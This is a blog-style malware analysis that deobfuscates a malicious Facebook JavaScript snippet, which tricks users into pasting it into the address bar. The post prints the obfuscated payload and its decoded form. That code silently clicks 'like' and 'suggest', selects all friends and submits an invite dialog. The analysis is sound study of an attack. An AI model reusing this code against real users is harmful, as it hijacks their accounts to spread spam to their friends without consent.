Simple javascript deobfuscation
I recently came across this piece of javascript on facebook, the malicious app was trying to trick users copying and pasting it into the address bar.
javascript:(function(){a='app125234247503667_jop';b='app125234247503667_jode';ifc='app125234247503667_ifc';ifo='app125234247503667_ifo';mw='app125234247503667_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c
Considering how obfuscated it is, (not to metion the app was trying to trick users into running it), this little bit of javascript is definately up to no good, but I wanted to know what it was doing. To do the deobfuscation, I used Didier Stevens modified version of spidermonkey (http://blog.didierstevens.com/programs/spidermonkey/). Spidermonkey is Mozilla’s C implementation of javascript, and the modified version has some extra functionality to help with malware analysis.
Looking at the javascript, we can see that it defines a function and runs it, so we’ll run the contents of the function through the interpreter.
js> a='app125234247503667_jop';b='app125234247503667_jode';ifc='app125234247503667_ifc';ifo='app125234247503667_ifo';mw='app125234247503667_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))
typein:2: TypeError: d[_0x95ea[2]] is not a function
js>
We end up with the following error: typein:2: TypeError: d[_0x95ea[2]] is not a function. One of the additional function of the modified spidermonkey implementation is eval(arg) commands write the arg to a file. Looking in the folder that the interpreter was run, there are 2 new files created eval.001.log and eval.uc.001.log. These contain the the arguments of an eval() call (the first file is in ASCII, the second in unicode).
The contents of the file (after doing some proper indentation):
var _0x95ea=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
d=document;
d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];
d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];
s=d[_0x95ea[2]](_0x95ea[6]);
m=d[_0x95ea[2]](_0x95ea[7]);
c=d[_0x95ea[9]](_0x95ea[8]);
c[_0x95ea[11]](_0x95ea[10],true,true);
s[_0x95ea[12]](c);
setTimeout(function(){fs[_0x95ea[13]]()},5000);
setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);
setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);
The _0x95ea array seems to contain hex encoded strings, so we’ll try decode them. This results in:
var _0x95ea=["visibility", "style", "getElementById", "hidden", "innerHTML", "value", "suggest", "likeme", "MouseEvents", "createEvent", "click", "initEvent", "dispatchEvent", "select_all", "sgm_invite_form", "/ajax/social_graph/invite_dialog.php", "submitDialog"];
Substituting these strings into the code gives us the following:
d=document;
document.getElementById(mw).style.visibility=hidden;
document.getElementById(a).innerHTML=document.getElementById(b).value
s=document.getElementById("suggest");
m=document.getElementById("likeme");
c=document.createEvent("MouseEvents");
c.initEvent("click",true,true);
s.dispatchEvent(c);
setTimeout(function(){fs.select_all()},5000);
setTimeout(function(){SocialGraphManager.submitDialog("sgm_invite_form","/ajax/social_graph/invite_dialog.php")},5000);
setTimeout(function(){m.dispatchEvent(c);d.getElementById(ifo).innerHTML=d.getElementById(ifc).value},5000);
There are still a few unknown variables (a, b, mw, ifo & ifc), but looking at the original obfuscated javascript we can see that they defined at the beginning
a='app125234247503667_jop'; b='app125234247503667_jode'; ifc='app125234247503667_ifc'; ifo='app125234247503667_ifo'; mw='app125234247503667_mwrapper';
I know hardly anything about facebook programming, but based on the variable names it seems quite obvious that this bit of javascript will cause the user to “like” the malicious app, and suggest it to all the users friends.